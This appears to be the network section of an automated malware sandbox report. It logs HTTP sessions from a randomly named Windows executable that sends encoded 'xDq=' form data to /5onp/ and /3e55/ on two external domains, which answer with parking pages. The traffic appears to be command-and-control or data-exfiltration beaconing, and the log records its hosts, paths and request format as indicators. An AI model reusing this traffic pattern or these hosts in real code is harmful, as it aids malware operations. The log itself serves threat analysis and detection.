data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 20, 2024 04:19:00.469716072 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGI5NmNkYTItYmNhNC00YmMxLWIxODUtNjE2YTdiN2YyODRiIiwicGFnZV90aW1lIjoxNzMyMDcyNz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	64585	199.59.243.227	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:02.537687063 CET	750	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 69 76 2f 44 4e 50 7a 6d 76 48 49 39 2b 58 33 41 74 62 32 6a 50 51 6a 47 58 73 51 65 4c 33 54 4f 43 58 4a 39 5a 6f 78 6d 77 51 66 43 48 39 69 50 62 41 76 4d 7a 47 69 37 44 2f 62 42 58 62 79 6b 71 52 6c 32 75 62 71 2b 78 56 41 55 72 6d 71 68 65 4f 53 66 36 49 52 58 39 46 74 55 6f 53 6f 44 61 36 53 79 6d 48 61 52 62 44 6b 57 58 74 36 56 6d 4d 7a 52 4c 46 33 2f 38 4b 4d 58 42 52 63 61 2f 76 4b 39 6e 79 5a 42 43 38 33 2f 4f 31 55 72 67 49 2b 57 58 32 4b 6b 63 6e 47 42 50 78 56 4e 34 53 79 45 65 6a 77 51 78 61 79 75 51 3d Data Ascii: xDq=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjtiv/DNPzmvHI9+X3Atb2jPQjGXsQeL3TOCXJ9ZoxmwQfCH9iPbAvMzGi7D/bBXbykqRl2ubq+xVAUrmqheOSf6IRX9FtUoSoDa6SymHaRbDkWXt6VmMzRLF3/8KMXBRca/vK9nyZBC83/O1UrgI+WX2KkcnGBPxVN4SyEejwQxayuQ=
Nov 20, 2024 04:19:02.980175018 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 20 Nov 2024 03:19:01 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 88eb3daf-5ccf-4166-8238-5fc0a2164eb6 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw== set-cookie: parking_session=88eb3daf-5ccf-4166-8238-5fc0a2164eb6; expires=Wed, 20 Nov 2024 03:34:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 71 4e 57 61 65 36 37 45 56 57 31 49 64 6a 62 79 57 46 50 79 6f 51 4d 4c 54 53 4c 43 6d 43 30 75 41 37 5a 5a 4f 6f 46 6b 43 67 72 45 47 31 41 6d 6f 32 73 44 44 47 58 62 58 32 30 79 33 6c 56 78 52 4f 39 44 4d 4c 78 70 30 52 55 73 6b 46 46 79 43 34 2b 71 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 20, 2024 04:19:02.980204105 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODhlYjNkYWYtNWNjZi00MTY2LTgyMzgtNWZjMGEyMTY0ZWI2IiwicGFnZV90aW1lIjoxNzMyMDcyNz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	64606	199.59.243.227	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:05.088510990 CET	10832	OUT	POST /5onp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.bcg.services Origin: http://www.bcg.services Referer: http://www.bcg.services/5onp/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 36 76 38 77 46 50 68 56 48 48 47 64 2b 58 37 67 74 65 32 6a 50 64 6a 43 37 67 51 65 50 4e 54 4d 36 58 4a 62 56 6f 6d 6a 63 51 57 43 48 39 67 50 62 4e 68 73 79 47 69 37 54 37 62 43 2f 62 79 6b 71 52 6c 33 2b 62 36 66 78 56 4d 30 72 70 74 68 65 61 57 66 36 67 52 57 56 56 74 55 6b 43 70 79 36 36 52 53 32 48 64 7a 6a 44 6d 32 58 76 37 56 6e 66 7a 51 33 65 33 2f 78 37 4d 58 64 37 63 61 62 76 61 34 57 57 45 77 2b 48 70 64 72 75 4d 63 56 6f 78 45 72 49 4d 30 51 79 4f 78 44 62 46 4f 42 78 36 6e 44 34 30 42 64 64 75 62 55 70 77 61 7a 69 6b 55 4b 73 31 41 76 4f 4e 4f 64 4d 42 70 58 53 45 2b 36 7a 57 62 53 43 66 6d 2f 44 61 52 7a 4b 76 70 4b 49 7a 66 31 59 35 63 56 76 2b 6b 6c 5a 43 51 72 2b 6a 6e 44 50 6d 59 42 35 4f 30 38 7a 6c 31 46 41 34 41 37 71 2b 79 44 59 56 4c 64 6c 50 4f 6d 61 6f 42 6c 61 65 59 32 65 4a 70 49 32 31 6b 41 42 31 55 4f 6d 32 59 71 6a 36 7a 4b 53 61 66 [TRUNCATED] Data Ascii: xDq=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjt6v8wFPhVHHGd+X7gte2jPdjC7gQePNTM6XJbVomjcQWCH9gPbNhsyGi7T7bC/bykqRl3+b6fxVM0rptheaWf6gRWVVtUkCpy66RS2HdzjDm2Xv7VnfzQ3e3/x7MXd7cabva4WWEw+HpdruMcVoxErIM0QyOxDbFOBx6nD40BddubUpwazikUKs1AvONOdMBpXSE+6zWbSCfm/DaRzKvpKIzf1Y5cVv+klZCQr+jnDPmYB5O08zl1FA4A7q+yDYVLdlPOmaoBlaeY2eJpI21kAB1UOm2Yqj6zKSafKMUad/lgggumK5MruGXCsARnfzgdgL/dK9wZpaOoXbGvFJRPXwULbxR48rNWYu+s0/76PEY+SXz4EcZaber61RbVDJhdvtx/GQJ62gKiQbx7waALECbFqsiXjgr4p3mCzOAcmNBZCd3SyfC7W57QUjJ0fyWdWRIzcCQ+6lmRsa7UUQpFdI55VPJMGnXmnIZ+DPDqtvtY15MDj85CI9zGwjVvKc2C9JItQvGtGPPyijQukGWmY8aERHG8uW+T8zU2reK80hXZ3Q3c2UR7M9hehTKV6jQ/fnebwSHS+w6ZuLAhtuhrbF/UZDHT/IR0MJiKF1MczyPsF4T/TgIVzc64S5p9WLll/EwbtfK6qgxKmA3xBAzzIyXOnwn4ildETgPZV3rhwXjptfzVnuScrtKH4YC+IPMZ7esvnAQ/0pgtlBdr8t5dRLzohH7K8eqqhkp+c5hHzL+zdZo/8W3d4yXJlsPz1Xu4xCXXCFcEU40xHbHPwJT0zA8Pv3/6sC2fHA4u4nS39TPx3KgvFzMqVUaz1HJwQpjDf9p0tFyuJYTGTGJaN4K2zSv6XoWlE+BxBdi6snW5cqDtZ57gCb0Wn6y6di5ugMpwqlhH9CZCi2Uo/z21gOqNd6zEf0Mna7rK9BZwu+yX9CfYoCtirFZCMOaO/ccZ2nrwPUdgyi [TRUNCATED]
Nov 20, 2024 04:19:05.536364079 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 20 Nov 2024 03:19:04 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 44d669ff-249b-4203-9143-b71eae261480 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw== set-cookie: parking_session=44d669ff-249b-4203-9143-b71eae261480; expires=Wed, 20 Nov 2024 03:34:05 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 71 4e 57 61 65 36 37 45 56 57 31 49 64 6a 62 79 57 46 50 79 6f 51 4d 4c 54 53 4c 43 6d 43 30 75 41 37 5a 5a 4f 6f 46 6b 43 67 72 45 47 31 41 6d 6f 32 73 44 44 47 58 62 58 32 30 79 33 6c 56 78 52 4f 39 44 4d 4c 78 70 30 52 55 73 6b 46 46 79 43 34 2b 71 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fqNWae67EVW1IdjbyWFPyoQMLTSLCmC0uA7ZZOoFkCgrEG1Amo2sDDGXbX20y3lVxRO9DMLxp0RUskFFyC4+qw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 20, 2024 04:19:05.536421061 CET	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRkNjY5ZmYtMjQ5Yi00MjAzLTkxNDMtYjcxZWFlMjYxNDgwIiwicGFnZV90aW1lIjoxNzMyMDcyNz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	64622	199.59.243.227	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:07.638355017 CET	468	OUT	GET /5onp/?xDq=YQtAzQFhELh+NSSrGqCNnhce8BNGqUHm8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+UQeEteLMn8uXkqbvRDHjk1GU4HyortJJJ3Q=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.bcg.services User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:19:08.084657907 CET	1236	IN	HTTP/1.1 200 OK date: Wed, 20 Nov 2024 03:19:07 GMT content-type: text/html; charset=utf-8 content-length: 1458 x-request-id: dc21d507-cd5a-4b9a-b06c-febbf42fc8f5 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LICcXk+8IFfy0yWT7o3j+PIM29fraICqJp4VycmoTEidvUMtrrk3fcSIsSMy5AH7hZffz7CwZNshZRXSpfBeuQ== set-cookie: parking_session=dc21d507-cd5a-4b9a-b06c-febbf42fc8f5; expires=Wed, 20 Nov 2024 03:34:08 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 49 43 63 58 6b 2b 38 49 46 66 79 30 79 57 54 37 6f 33 6a 2b 50 49 4d 32 39 66 72 61 49 43 71 4a 70 34 56 79 63 6d 6f 54 45 69 64 76 55 4d 74 72 72 6b 33 66 63 53 49 73 53 4d 79 35 41 48 37 68 5a 66 66 7a 37 43 77 5a 4e 73 68 5a 52 58 53 70 66 42 65 75 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LICcXk+8IFfy0yWT7o3j+PIM29fraICqJp4VycmoTEidvUMtrrk3fcSIsSMy5AH7hZffz7CwZNshZRXSpfBeuQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 20, 2024 04:19:08.084717989 CET	911	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMyMWQ1MDctY2Q1YS00YjlhLWIwNmMtZmViYmY0MmZjOGY1IiwicGFnZV90aW1lIjoxNzMyMDcyNz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	64658	13.248.169.48	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:13.185730934 CET	724	OUT	POST /3e55/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.egldfi.xyz Origin: http://www.egldfi.xyz Referer: http://www.egldfi.xyz/3e55/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 54 35 30 4f 75 4a 73 66 78 53 32 57 33 78 78 75 43 4a 78 37 36 64 6f 6a 67 71 6d 54 69 4f 55 64 38 6e 48 41 76 4e 2f 57 52 75 46 42 53 42 54 59 54 43 43 57 6f 33 4b 73 43 2f 64 46 4d 37 55 49 55 64 58 67 74 31 74 34 47 39 79 71 51 6a 52 44 6b 48 57 55 38 68 62 78 5a 55 31 52 32 75 64 37 4e 41 34 30 34 6c 37 69 70 68 77 58 54 69 4b 7a 72 70 5a 46 35 56 6f 32 72 5a 2b 46 49 4b 4c 72 58 48 46 69 7a 69 7a 6f 67 41 64 54 67 4f 56 54 59 4b 78 4c 47 75 78 73 76 71 44 75 57 30 62 65 57 72 54 68 44 32 39 66 39 58 2f 45 44 79 6b 6d 31 77 5a 66 57 4f 37 32 63 47 69 41 51 66 76 33 31 51 3d 3d Data Ascii: xDq=T50OuJsfxS2W3xxuCJx76dojgqmTiOUd8nHAvN/WRuFBSBTYTCCWo3KsC/dFM7UIUdXgt1t4G9yqQjRDkHWU8hbxZU1R2ud7NA404l7iphwXTiKzrpZF5Vo2rZ+FIKLrXHFizizogAdTgOVTYKxLGuxsvqDuW0beWrThD29f9X/EDykm1wZfWO72cGiAQfv31Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	64676	13.248.169.48	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:15.732769012 CET	744	OUT	POST /3e55/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.egldfi.xyz Origin: http://www.egldfi.xyz Referer: http://www.egldfi.xyz/3e55/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 54 35 30 4f 75 4a 73 66 78 53 32 57 34 78 42 75 5a 71 5a 37 38 39 6f 6b 75 4b 6d 54 74 75 55 5a 38 6e 4c 41 76 4d 37 34 52 63 68 42 54 6a 4c 59 51 44 43 57 70 33 4b 73 4a 66 64 41 42 62 55 39 55 64 72 57 74 33 35 34 47 39 6d 71 51 69 68 44 6b 77 71 58 38 78 62 7a 4d 45 31 58 79 75 64 37 4e 41 34 30 34 6c 76 63 70 6c 63 58 51 53 61 7a 71 4d 31 43 36 56 6f 31 6f 5a 2b 46 4d 4b 4c 76 58 48 45 48 7a 67 48 43 67 43 56 54 67 4c 35 54 59 62 78 4b 66 2b 78 71 72 71 43 35 54 33 4b 58 59 34 6e 70 4b 77 39 6f 33 6c 33 4c 43 30 70 38 6b 42 34 49 45 4f 66 46 42 42 72 30 64 63 53 2b 75 62 33 4e 78 6f 74 70 59 62 79 30 54 76 78 6a 63 38 44 44 7a 59 77 3d Data Ascii: xDq=T50OuJsfxS2W4xBuZqZ789okuKmTtuUZ8nLAvM74RchBTjLYQDCWp3KsJfdABbU9UdrWt354G9mqQihDkwqX8xbzME1Xyud7NA404lvcplcXQSazqM1C6Vo1oZ+FMKLvXHEHzgHCgCVTgL5TYbxKf+xqrqC5T3KXY4npKw9o3l3LC0p8kB4IEOfFBBr0dcS+ub3NxotpYby0Tvxjc8DDzYw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	64691	13.248.169.48	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:19:18.273963928 CET	10826	OUT	POST /3e55/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.egldfi.xyz Origin: http://www.egldfi.xyz Referer: http://www.egldfi.xyz/3e55/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 54 35 30 4f 75 4a 73 66 78 53 32 57 34 78 42 75 5a 71 5a 37 38 39 6f 6b 75 4b 6d 54 74 75 55 5a 38 6e 4c 41 76 4d 37 34 52 63 70 42 54 51 44 59 54 67 36 57 75 33 4b 73 56 50 64 42 42 62 55 67 55 5a 47 66 74 33 6b 50 47 2f 65 71 43 56 4a 44 74 68 71 58 70 42 62 7a 54 30 31 57 32 75 64 55 4e 41 49 77 34 6c 2f 63 70 6c 63 58 51 51 53 7a 37 5a 5a 43 32 31 6f 32 72 5a 2b 4a 49 4b 4b 4b 58 48 39 36 7a 6a 71 31 67 79 31 54 67 72 70 54 5a 70 5a 4b 41 75 78 6f 73 71 43 78 54 33 47 55 59 34 36 53 4b 77 67 2f 33 6e 72 4c 41 56 5a 6e 38 56 73 4e 62 73 57 66 53 42 43 52 45 38 43 51 6e 34 33 42 33 37 6f 39 44 6f 71 36 58 50 52 72 59 38 48 4c 69 50 6e 6b 57 49 76 41 51 32 6f 69 69 6f 33 5a 6c 46 4d 67 2f 77 45 4b 49 30 66 77 6d 62 4a 46 56 43 69 44 2f 69 78 4e 70 72 79 4d 42 62 4d 77 65 54 47 53 4c 66 6a 5a 79 77 48 37 6c 4b 62 30 58 32 53 72 2b 79 78 52 44 77 79 75 5a 35 57 7a 43 4e 63 61 2f 44 49 54 70 52 67 33 2f 66 55 4b 5a 74 34 64 32 30 69 65 45 78 30 64 7a 76 75 2b 41 78 4b 77 47 56 6f 32 64 52 [TRUNCATED] Data Ascii: xDq=T50OuJsfxS2W4xBuZqZ789okuKmTtuUZ8nLAvM74RcpBTQDYTg6Wu3KsVPdBBbUgUZGft3kPG/eqCVJDthqXpBbzT01W2udUNAIw4l/cplcXQQSz7ZZC21o2rZ+JIKKKXH96zjq1gy1TgrpTZpZKAuxosqCxT3GUY46SKwg/3nrLAVZn8VsNbsWfSBCRE8CQn43B37o9Doq6XPRrY8HLiPnkWIvAQ2oiio3ZlFMg/wEKI0fwmbJFVCiD/ixNpryMBbMweTGSLfjZywH7lKb0X2Sr+yxRDwyuZ5WzCNca/DITpRg3/fUKZt4d20ieEx0dzvu+AxKwGVo2dR8qPpsr5SMoiP53PVLt8bgxo5SxL6NZ5kGn40ppzttgS75WUFtTVvWzSjBbqDKYpBVOK7Bv76DrVQzKAjIX213FqbHEU+Lgkvz2NKSRT/15TvqmFCWo9UJN8L4ggSQd40JQlk5Y6RgeditwP/Nsfedr9FEbiNUMbkufEaEpSzaf8ShvW6l5tVj2TY7+e75FCfkEJ1ACBmMKOnFhNy2gMvbgFz2yxG+7VRO/YCU+989aoCdpMXzkiHiVgpluMwYBNAsYc7f/YBRLDY2pQfOMrImTMMbmbZBjJySkvUtLY80HHmLsHOpJ0oSRZaGAnfwq4y8iiPhAacl7r1AYxqJhnmOaDB9RenufRucoLQDR5038jDyxwWslvmMa0+ZIP2TwHQY40oqMTLIiEcQBb2KhYc11JSAN2J